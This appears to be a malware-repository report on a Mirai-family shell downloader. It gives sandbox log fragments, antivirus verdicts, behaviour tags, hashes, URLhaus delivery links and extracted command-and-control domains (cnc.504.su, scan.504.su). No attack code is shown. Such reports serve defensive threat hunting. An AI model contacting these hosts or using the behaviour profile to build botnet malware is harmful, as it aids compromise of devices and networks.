pid=5314->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=08c488f7-2600-0000-f013-c5bfc4140000 pid=5316->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=08c488f7-2600-0000-f013-c5bfc4140000 pid=5316|send-data send-data to 3072 IP addresses review logs to see them all guuid=08c488f7-2600-0000-f013-c5bfc4140000 pid=5316->guuid=08c488f7-2600-0000-f013-c5bfc4140000 pid=5316|send-data send guuid=8c0073f8-2600-0000-f013-c5bfc6140000 pid=5318->4bcd05e0-7ebf-53bb-9cc8-c008d3256770 con guuid=3572a5fa-2600-0000-f013-c5bfc9140000 pid=5321->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=3572a5fa-2600-0000-f013-c5bfc9140000 pid=5321->5fbefa0b-74db-5ddb-909f-7c8f89ca1384 con
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/29fa130eed8854f328b218ef7fde38145c9b1fb9544e85fda781a9f7936f7a81
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/29fa130eed8854f328b218ef7fde38145c9b1fb9544e85fda781a9f7936f7a81/
Verdict:
Malicious
Threat:
Family.MIRAI
Link:
https://tip.neiki.dev/file/29fa130eed8854f328b218ef7fde38145c9b1fb9544e85fda781a9f7936f7a81
Threat name:
Linux.Downloader.Medusa
Create hunting rule
Status:
Malicious
First seen:
2025-09-20 16:44:19 UTC
File Type:
Text (Shell)
AV detection:
23 of 36 (63.89%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=fh5bgdxnrbkpgkfsddxx7xrycrojwh5zkrhil7nhqgu7pe3ppkaq._file
Result
Malware family:
mirai
Create hunting rule
Score:
  10/10
Tags:
family:mirai botnet:unstable antivm botnet defense_evasion discovery linux upx
Link:
https://tria.ge/reports/251012-npq38svxfz/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Checks CPU configuration
Reads system network configuration
UPX packed file
Enumerates active TCP sockets
Enumerates running processes
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Contacts a large (54916) amount of remote hosts
Creates a large amount of network flows
Mirai
Mirai family
Malware Config
C2 Extraction:
cnc.504.su
scan.504.su
Malware family:
Mirai
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/29fa130eed88/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/29fa130eed8854f328b218ef7fde38145c9b1fb9544e85fda781a9f7936f7a81

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Create hunting rule
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh 29fa130eed8854f328b218ef7fde38145c9b1fb9544e85fda781a9f7936f7a81

(this sample)

Mirai

elf 924b4daa3d183fc7d1312a17b68aa952c8d0136918478730cd95623bb1890ed9

  
URLhaus
https://urlhaus.abuse.ch/url/3669662/
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/3669702/
  
URLhaus
https://urlhaus.abuse.ch/url/3669710/
  
Dropping
MD5 e4e48028a8e278bd6b7a9296154dcb51
  
Dropping
SHA256 924b4daa3d183fc7d1312a17b68aa952c8d0136918478730cd95623bb1890ed9

Comments